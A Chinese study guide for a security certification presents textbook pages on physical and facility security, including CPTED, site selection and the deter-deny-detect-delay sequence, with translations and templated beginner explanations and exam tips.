OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

入侵防御系统 IPS:IPS 可检测并主动阻断恶意流量。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

风险评估不是漏洞扫描;它更高层,服务于决策和资源分配。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

网络题先定位层次,再判断协议、设备或攻击位置。

IPS 放在线路中,误报可能影响可用性。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
风险评估 风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。
NIST NIST 提供美国常用安全标准、框架和指南。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 03 / PDF P658

第 658 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

redundant tasks or one system taking over the features and abilities of another. Although, in some instances, this can result in improved efficiency and cost savings, it can also represent a single point of failure and become a more valuable target for malicious actors and intruders. For example, if voice, video, building control, storage (i.e., network-attached storage [NAS]), and productivity traffic all share a single connection path rather than individual paths, a single act of sabotage to the main connection is all that is required for intruders or thieves to sever external communications. Security staff should participate in site and facility design considerations.

Otherwise, many important aspects of physical security essential for the existence of logical security may be overlooked. With security staff involved in the physical facility design, you can be assured that your long-term security goals as an organization will be supported not just by your policies, personnel, and electronic equipment, but also by the building itself. A secure facility plan is based on a layered defense model. Only with overlapping layers of physical security can a reasonable defense be established against would-be intruders. Physical security should be thought of as establishing an obstacle course or gauntlet that attackers have to attempt to work their way through.

Thus, security mechanisms are positioned to operate in series rather than in parallel to optimize the difficulty of breaching the protective infrastructure. Site Selection Site selection should be based on the security needs of the organization. Cost, location, and size are important, but addressing security requirements should always take precedence. Securing assets depends largely on-site security, which involves numerous considerations and situational elements. Site location and construction are crucial in the overall site selection process. Proximity to other buildings and businesses is a crucial consideration.

What attention do they draw, and how does that affect your operation or facility? If a nearby business attracts too many visitors, generates noise, causes vibrations, or handles dangerous materials, they could harm your employees or buildings. Proximity to emergency-response personnel is another issue to consider.

中文直译 / 整理

冗余任务,或一个系统接管另一个系统的功能和能力。 尽管在某些情况下,这 可以提高效率并节省成本,但也可能形成单点故障,并成为恶意行为者和入侵 者更值得攻击的目标。 例如,如果语音、视频、楼宇控制、存储(即网络附加 存储 [NAS])和生产力流量都共享一条单一连接路径,而非各自独立的路径, 那么入侵者或窃贼只需破坏主连接,即可切断外部通信。 安保人员应参与场地和设施的设计考量。 否则,许多对逻辑安全存在至关重要 的物理安全方面可能会被忽视。 通过让安保人员参与物理设施的设计,您可以 确保组织的长期安全目标不仅由政策、人员和电子设备支持,同时也由建筑物 本身提供保障。 安全设施计划基于分层防御模型。 只有通过重叠的物理安全层,才能为潜在入 侵者建立合理的防御体系。 物理安全应被视为设置一道障碍赛道或考验通道, 攻击者必须设法穿越。 因此,安全机制应串联布置,而非并行布置,以最大化 突破防护基础设施的难度。 选址 选址应基于组织的安全需求。 成本、位置和规模固然重要,但满足安全要求始 终应优先考虑。 资产的安全在很大程度上依赖于现场安全,这涉及众多考量和情境因素。 场 地位置和建筑结构在整个选址过程中至关重要。

与其它建筑和企业的邻近关系是一个关键考虑因素。 它们吸引了多少关注,这 如何影响您的运营或设施? 如果附近的企业吸引了过多访客、产生噪音、造成 震动或处理危险物质,可能会对您的员工或建筑物造成损害。 与应急响应人员 的邻近关系也是需要考虑的另一个问题。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

分层:分层把控制按层排列,让攻击者必须连续突破。

政策:政策是高层原则,说明必须遵守什么。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 658 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

serial controls 更深,parallel controls 更宽;题目会考深度和广度。

Policy 高层、强制、稳定;Procedure 具体步骤。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

网络题先定位层次,再判断协议、设备或攻击位置。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
分层 分层把控制按层排列,让攻击者必须连续突破。
政策 政策是高层原则,说明必须遵守什么。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 04 / PDF P659

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

At a minimum, ensure that the building is designed to withstand local extreme weather conditions and that it can deter or fend off most overt breakin attempts. Vulnerable entry points such as windows and doors tend to dominate such analysis. Still, you should also evaluate objects (trees, shrubs, planters, columns, storage buildings, or other human-made items) that can obscure break-in attempts. Does your organization need to be easily accessed and thus clearly visible? Or would it be a better design not to stand out?

Industrial camouflage is the attempt to mask or hide a facility's actual function, purpose, or operations by providing a façade presenting a believable or convincing alternative. For example, a data center may present itself as a food-packing facility. Facility Design The top priority of security should always be the protection of the life and safety of personnel. To that end, be sure that all facility designs and physical security controls are in compliance with all applicable laws and regulations. These may include health and safety requirements, building codes, labor restrictions, and more.

In the United States, some common regulations to follow in regard to facility security are guidelines and requirements from the Occupational Safety and Health Administration (OSHA) and the Environmental Protection Agency (EPA). For most organizations, having a facility security officer to assist with the design, implementation, management, and oversight of facility security may be worthwhile. Important issues to consider include combustibility, fire rating, construction materials, load rating, placement, and control of items such as walls, doors, ceilings, flooring, HVAC, power, water, sewage, gas, and so on.

Forced intrusion, emergency access, resistance to entry, direction of entries and exits, use of alarms, and conductivity are other important aspects to evaluate. Every element within a facility should be evaluated in terms of how it could be used for and against the protection of the IT infrastructure and personnel (for example, positive flows of air and water from inside a facility to outside its boundaries). There's also a well-established school of thought on “secure architecture” that's often called Crime Prevention Through Environmental Design (CPTED).

First-generation CPTED addresses facility design, landscaping, entrance concepts, campus layouts, lighting, road placement, and traffic management of vehicles and those on foot, while Second-generation CPTED

中文直译 / 整理

至少应确保建筑物能够抵御当地的极端天气条件,并能够阻止或抵御大多数明 显的入侵行为。 窗户和门等易受攻击的入口点通常在此类分析中占主导地位。 然而,您还应评估可能掩盖入侵行为的物体(如树木、灌木、花盆、柱子、储 物建筑或其他人造物品)。 您的组织是否需要易于访问并因此明显可见? 还是不显眼的设计更为合适? 工 业伪装是指通过提供一个可信或令人信服的伪装,来掩盖设施的实际功能、目 的或操作。 例如,一个数据中心可能伪装成食品包装设施。 设施设计 安全的首要任务始终是保护人员的生命和安全。 为此,请确保所有设施设计和 物理安全控制措施均符合所有适用的法律法规。 这些法规可能包括健康与安全 要求、建筑规范、劳动限制等。 在美国,与设施安全相关的常见法规包括职业 安全与健康管理局(OSHA)和环境保护署(EPA)的指南和要求。 对于大多 数组织而言,配备一名设施安全官员协助设计、实施、管理和监督设施安全, 可能是值得的。 需要考虑的重要问题包括可燃性、防火等级、建筑材料、承重等级、位置以及 墙壁、门、天花板、地板、暖通空调、电力、供水、污水、燃气等物品的控制。

强制入侵、紧急通行、抗入侵能力、出入口方向、报警系统使用以及导电性也 是需要评估的其他重要方面。 设施内的每个元素都应根据其对IT基础设施和人 员保护的潜在利弊进行评估(例如,设施内部向外部的空气和水流向)。 还有一种关于“安全架构”的成熟理论,通常被称为通过环境设计预防犯罪 (CPTED)。 第一代CPTED关注设施设计、景观规划、出入口概念、校园布 局、照明、道路布置以及车辆和行人的交通管理,而第二代CPTED

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

指南:指南是建议做法,不一定强制。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Recommended、not compulsory 常对应 guideline。

网络题先定位层次,再判断协议、设备或攻击位置。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
指南 指南是建议做法,不一定强制。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 05 / PDF P660

第 660 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

addresses social cohesion. community culture, connectivity, and threshold capacity. The core principle of CPTED is that the design of the physical environment can be managed, manipulated, and crafted with the intention to create behavioral effects or changes in people present in those areas that result in a reduction of crime as well as a reduction of the fear of crime. Just think of a dark back alley with sunken doorways and several overflowing trash dumpsters; then compare that to a well-lit street with a broad sidewalk with attractive storefronts. Notice the feelings you have about those locations just by thinking about them.

CPTED design-guided locations have an amazing but subtle effect on people's behaviors as well as their perceptions of a location. CPTED has numerous recommendations and suggestions for improving facility design for security purposes, such as the following: Keep planters under 2.5 feet tall—this prevents them from being used to hide behind or as a step to reach a window. Keep decorative elements small or far away from the building. Locate the data center at the core of the building. Provide benches and tables to encourage people to sit and look around; they provide automatic surveillance. Mount cameras in full view to act as a deterrent.

Keep entrances open and clear (i.e., without obstacles like trees or columns) to maintain visibility. Keep the number of entrances to a minimum and close off doorways during evenings or weekends when fewer workers are present. Provide parking for visitors near the entrance. Make delivery access driveways and entrances less visible or noticeable to the public—for example, by positioning them on the back of the building and requiring an alternate road. First-generation CPTED has four principles: access control, natural surveillance, image and milieu, and territorial control.

Access control is the subtle guidance of those entering and leaving a building through the placement of entranceways, the use of fences and bollards, and the placement of lights. The idea here is to make the entrance point to a

中文直译 / 整理

关注社会凝聚力、社区文化、连通性与阈值容量。 CPTED的核心原则是,物理环境的设计可以通过管理、操控和精心规划,以期产生 对这些区域中人员行为的影响或改变,从而减少犯罪以及对犯罪的恐惧感。 想 象一下一条昏暗的后巷,门廊凹陷,多个垃圾桶溢出 的垃圾; 再将其与一条灯光充足、人行道宽阔、店面吸引人的街道进行对比。 仅通过想象这些地点,你就能感受到它们带来的不同情绪。 遵循CPTED设计原 则的地点,对人们的行为及其对地点的感知具有惊人而微妙的影响。 CPTED为提高设施的安全性设计提供了大量建议,例如: 花坛高度应低于2.5英尺——这可以防止其被用作藏身之处或踩踏以够到窗户。 装饰性元素应保持较小尺寸,或远离建筑物。 将数据中心定位在建筑物的核心位置。 提供长椅和桌子,以鼓励人们坐下并环顾四周; 它们能提供自动监控。 将摄像头安装在显眼位置,以起到威慑作用。 保持出入口畅通无阻(即,不要有树木或柱子等障碍物),以维持可见 性。 将出入口数量降至最低,并在夜间或周末工作人员较少时关闭门道。 在入口附近为访客提供停车空间。 使配送通道和入口对公众不那么显眼或引人注意——例如,将其设在建 筑背面并要求使用另一条道路。

第一代CPTED有四个原则:出入控制、自然监视、形象与环境、以及领 域控制。 访问控制是通过出入口的布局、围栏和柱墩的使用以及照明的布置,对进出建筑物的人流进行微妙引导。 其理念是让入 口自然呈现出入口的特征,而无需使用巨大的标牌写着“此处进入! ”这也可以延伸至内部,通过创建安全区域来区分 一般访问区域和需要特定分类或职位职责才能进入的高安全区域。 同一访问级别的区域应保持开放、友好且易于通行, 而受到限制或封闭的区域则应显得更难进入,并需要个人付出更多努力和明确意图才能进入。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 660 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

网络题先定位层次,再判断协议、设备或攻击位置。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 06 / PDF P661

第 661 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

building look like an entrance point without having to resort to giant signs saying, “Enter Here!” This can also extend internally by creating security zones to distinguish the general access areas from those of higher security that require certain classifications or job responsibilities to enter. Those areas of the same access level should be open, inviting, and easy to move around in, but those areas that are restricted or closed off should seem more difficult to access and require more effort and intention of the individual to access. Natural surveillance is any means to make criminals feel uneasy through the increasing opportunities for them to be observed.

This can be accomplished by an open and obstacle-free outside area, especially around entrances, with clear lines of sight. This can be further increased by encouraging workers and even the public to loiter around the area by providing a pleasing landscape (not directly against the buildings) with plenty of seating. Walkways and stairways should be open so that others nearby can easily see if someone is present. All areas should be very well lit, especially at night. Image refers to the visual elements and aesthetics of an environment. A wellmaintained, aesthetically pleasing space tends to project a positive image.

This positive image can influence people's behavior and perceptions, making them more likely to engage positively with the environment. Conversely, poorly maintained or neglected spaces may project a negative image, potentially attracting criminal activity. Milieu encompasses the broader environment or setting, including the overall ambiance and character of a place. It considers factors such as lighting, landscaping, signage, and the general “feel” of the surroundings. A positive milieu can contribute to a sense of safety and community, whereas a negative or hostile milieu may contribute to feelings of insecurity and vulnerability.

Territorial control is the attempt to make the area feel like an inclusive, caring community. The area should be designed so that it looks cared for and respected, and that it is actively being defended. This can be accomplished with decorations, flags, lighting, landscaping, presentations of company logos, clearly visible building numbers, decorative sidewalks, and other architectural features. This approach may cause intruders to feel like they don't belong and that their activities would be at a higher risk of being detected. Second-generation CPTED has four principles: social cohesion, community culture, connectivity, and threshold capacity.

Social cohesion refers to the level of connectedness and solidarity within a community. It involves fostering positive relationships among community

中文直译 / 整理

建筑外观应呈现出入口的特征,而无需使用巨大的标识写着“由此进入! ”这 也可以延伸至内部,通过设立安全区域来区分普通访问区域与需要特定权限或 岗位职责才能进入的高安全区域。 相同访问级别的区域应开放、友好且便于通 行,而受到限制或封闭的区域则应显得更难进入,并需要个人付出更多努力和 明确的意图才能进入。 自然监视是指通过增加犯罪者被观察的机会,使其感到不安的任何手段。 这可 以通过开放且无障碍的外部区域来实现,尤其是在出入口附近,确保视线清晰。 通过提供宜人的景观(不直接紧邻建筑)并设置充足的座椅,鼓励工作人员甚 至公众在该区域逗留,可以进一步增强这种效果。 人行道和楼梯应保持开放, 以便附近的人能轻易察觉是否有人在场。 所有区域都应非常明亮,尤其是在夜 间。 形象指的是环境的视觉元素和美学特征。 一个维护良好、美观宜人的空间往往 能传递积极的形象。 这种积极形象可以影响人们的行为和感知,使其更可能以 积极的方式与环境互动。 相反,维护不善或被忽视的空间可能传递负面形象, 从而可能吸引犯罪活动。 环境涵盖更广泛的环境或背景,包括场所的整体氛围 和特征。 它考虑照明、景观设计、标识牌以及周围环境的整体“感觉”。

积极 的环境有助于营造安全感和社区感,而消极或敌对的环境则可能导致不安全感 和脆弱感。 领土控制旨在使该区域营造出一种包容和关怀的社区氛围。 该区域应被设计得 看起来得到妥善维护和尊重,并且正在被积极守护。 这可以通过装饰、旗帜、 照明、景观设计、公司标志展示、清晰可见的建筑编号、装饰性人行道以及其 他建筑特征来实现。 这种方法可能使入侵者感到自己格格不入,且其行为被发 现的风险更高。 第二代CPTED有四个原则:社会凝聚力、社区文化、连通性和阈值容量。 社会凝聚力指的是社区内连接性与团结的程度。 它涉及促进社区成员之间的积 极关系

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

入侵防御系统 IPS:IPS 可检测并主动阻断恶意流量。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 661 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

网络题先定位层次,再判断协议、设备或攻击位置。

IPS 放在线路中,误报可能影响可用性。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 07 / PDF P662

第 662 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

members. A cohesive community is more likely to be vigilant, look out for one another, and collectively address safety concerns. Second-generation CPTED recognizes the importance of social cohesion in creating a supportive environment that deters crime. Understanding and respecting the unique community culture is essential in second-generation CPTED. This includes considering the values, traditions, and norms that shape the community's identity. Design interventions should align with the community's culture to ensure they are well received and effectively integrated.

Respecting cultural diversity contributes to a sense of ownership and pride among community members, fostering a safer and more inclusive environment. Connectivity involves creating physical and social links within a community. This includes designing spaces that facilitate interaction and communication among residents. Well-connected neighborhoods with clear pathways, parks, and communal spaces promote a sense of belonging and discourage criminal activities by increasing visibility and natural surveillance. Threshold capacity refers to the ability of a community or neighborhood to absorb and respond to external influences while maintaining its stability and security.

Considering the threshold capacity involves assessing how various changes, such as new developments or social programs, might impact the community. Understanding and respecting the threshold capacity help prevent unintended negative consequences that could undermine the safety and well-being of the community. The International CPTED Association is an excellent source for information on this subject, as is Oscar Newman's book Creating Defensible Space, published by the U.S. Department of Housing and Urban Development's Office of Policy Development and Research. The use of CPTED does not replace the use of actual facility hardening, such as locked doors, security guards, fences, and bollards.

However, combining traditional physical barriers and CPTED strategies can provide preventive, detection, and deterrent security. Implement Site and Facility Security Controls The grouping of controls named “physical” should probably be called “facility” instead since the controls for protecting a facility include policies, personnel management, computer technology, and physical barriers. So, just calling this 。

中文直译 / 整理

一个具有凝聚力的社区更有可能保持警觉,相互照应,并共同应对安全问题。 第二代CPTED认识到社会凝聚力在营造支持性环境以威慑犯罪方面的重要性。 在第二代CPTED中,理解和尊重独特的社区文化至关重要。 这包括考虑塑造社 区身份的价值观、传统和规范。 设计干预措施应与社区文化相一致,以确保其 被良好接受并有效融入。 尊重文化多样性有助于增强社区成员的归属感和自豪 感,营造更安全、更包容的环境。 连通性涉及在社区内建立物理和社会联系。 这包括设计促进居民互动与交流的 空间。 具有良好连接性、清晰路径、公园和公共空间的社区能够增强归属感, 并通过提高可见性和自然监控来遏制犯罪活动。 阈值能力是指社区或邻里在保持稳定与安全的同时,吸收和应对外部影响的能 力。 考虑阈值能力涉及评估各种变化(如新开发项目或社会计划)可能对社区 产生的影响。 理解并尊重阈值能力有助于防止可能损害社区安全与福祉的意外 负面后果。 国际CPTED协会是了解这一主题的绝佳信息来源,奥斯卡·纽曼的著作 Creating Defensible Space,由美国住房和城市发展部政策发展与研究办公室 出版,亦是重要参考。

CPTED的使用并不能替代实际的设施加固措施,例如上锁的门、保安人员、 围栏和防撞柱。 然而,将传统的物理屏障与CPTED策略相结合,可以提供预 防性、检测性和威慑性的安全防护。 实施场地和设施安全控制 名为“物理”的控件分组可能应改为“设施”,因为保护设施的控件包括策略、 人员管理、计算机技术和物理屏障。 因此,仅称此

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

政策:政策是高层原则,说明必须遵守什么。

身份:身份是主体在系统中的标识。

日志:日志记录系统和用户活动,用于监控、审计和调查。

遏制:遏制先阻止事件继续扩大,不急着完全修复。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 662 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Policy 高层、强制、稳定;Procedure 具体步骤。

身份管理题要区分识别、认证、授权、审计。

日志要保护完整性、时间同步和访问控制。

事件响应中先控制影响,再根除原因。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
政策 政策是高层原则,说明必须遵守什么。
身份 身份是主体在系统中的标识。
日志 日志记录系统和用户活动,用于监控、审计和调查。
遏制 遏制先阻止事件继续扩大,不急着完全修复。
学习单元 08 / PDF P663

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

grouping physical is not as accurate as it could be, but physical is the accepted terminology. Administrative physical security controls include facility construction and selection, site management, building design, personnel controls, awareness training, and emergency response and procedures. Technical physical security controls include building access controls; intrusion detection; alarms; security cameras; monitoring; heating, ventilation, and airconditioning (HVAC) power supplies; and fire detection and suppression. Physical controls for physical security include fencing, lighting, locks, construction materials, person traps, guard dogs, and security guards.

When designing physical security for an environment, focus on the functional order in which controls should be used. A common order of operations is as follows: 1. Deter 2. Deny 3. Detect 4. Delay 5. Determine 6. Decide Security controls should be deployed so that initial attempts to access physical assets are deterred (boundary restrictions accomplish this). If deterrence fails, then direct access to physical assets should be denied (for example, locked vault doors). If denial fails, your system needs to detect intrusion (for example, using motion sensors).

If the breach is successful, then the intruder should be delayed sufficiently in their access attempts to enable authorities to respond (for example, a cable lock on the asset). Security staff or legal authorities should determine the cause of the incident or assess the situation to understand what is occurring. Then, based on that assessment, they should decide on the response to implement, such as apprehending the intruder or collecting evidence for further investigation.

中文直译 / 整理

分组为“物理”并不如它本可做到的那样准确,但“物理”是被接受的术语。 行政物理安全控制包括设施建设和选址、场地管理、建筑设计、人员控制、 意识培训以及应急响应和程序。 技术物理安全控制包括建筑访问控制、入侵 检测、报警系统、安防摄像头、监控、供暖、通风和空调(HVAC)电源, 以及火灾检测和抑制系统。 物理安全的物理控制包括围栏、照明、锁具、建 筑材料、人员陷阱、警犬和安保人员。 在为环境设计物理安全时,应关注控制应使用的功能顺序。 常见的操作顺序如 下: 1. 威慑 2. 拒绝 3. 检测 4. 延缓 5. 确定 6. 决定 安全控制应部署到位,以使对物理资产的初始访问尝试被阻止(边界限制可 实现此目的)。 如果阻止失败,则应拒绝对物理资产的直接访问(例如,上 锁的保险库门)。 如果拒绝失败,您的系统需要检测入侵(例如,使用运动 传感器)。 如果入侵成功,则应使入侵者在访问尝试中被延缓足够长的时间, 以便当局能够响应(例如,对资产使用电缆锁)。 安全人员或法律当局应 确定 事件的原因或评估情况以了解正在发生的事情。 然后,基于该评估,他们应 决定 实施何种应对措施,例如抓捕入侵者或收集 证据以供进一步调查。

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

程序:程序是一步一步怎么做。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Step-by-step、SOP 常对应 procedure。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
程序 程序是一步一步怎么做。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 09 / PDF P664

可用性:需要时能用,且性能可接受

可用性关注中断、故障、DoS、备份和冗余。

教材原文段落

A cable lock is used to protect smaller devices and equipment by making them more difficult to steal. A cable lock usually isn't an impenetrable security device, since most portable systems are constructed with thin metal and plastic. However, a thief will be reluctant to swipe a cable-locked device, because the damage caused by forcing the cable lock out of the security/lock slot will be obvious when they attempt to pawn or sell the device. Equipment Failure Preparing for equipment failure can take many forms. In some non-missioncritical situations, knowing where to purchase replacement parts for a 48- hour replacement timeline is sufficient.

In other situations, maintaining onsite replacement parts is mandatory. Remember that the response time in returning a system to a fully functioning state is directly proportional to the cost involved in maintaining such a solution. Costs include storage, transportation, pre-purchasing, and maintaining on-site installation and restoration expertise. In some cases, keeping replacements on-site is not feasible. Establishing a service-level agreement (SLA) with the hardware vendor is essential for those situations. An SLA clearly defines the response time a vendor will provide during an equipment failure emergency. Equipment failure is a common cause of a loss of availability.

When deciding on strategies to maintain availability, it is often important to understand the criticality of each asset and business process as well as the associated allowable interruption window (AIW), service delivery objective (SDO), and maximum tolerable downtime/outage (MTD/MTO) (see Chapters 3 and 18 for more on these concepts). These ranges, boundaries, and objectives help focus on the necessary strategies to maintain availability or at least minimize downtime while optimizing cost efficiency. Aging hardware should be scheduled for replacement and/or repair.

The schedule for such operations should be based on the mean time to failure (MTTF) and mean time to repair (MTTR) estimates established for each device or on prevailing best organizational practices for managing the hardware life cycle. MTTF is the expected typical functional lifetime of the device given a specific operating environment. Be sure to schedule all devices

中文直译 / 整理

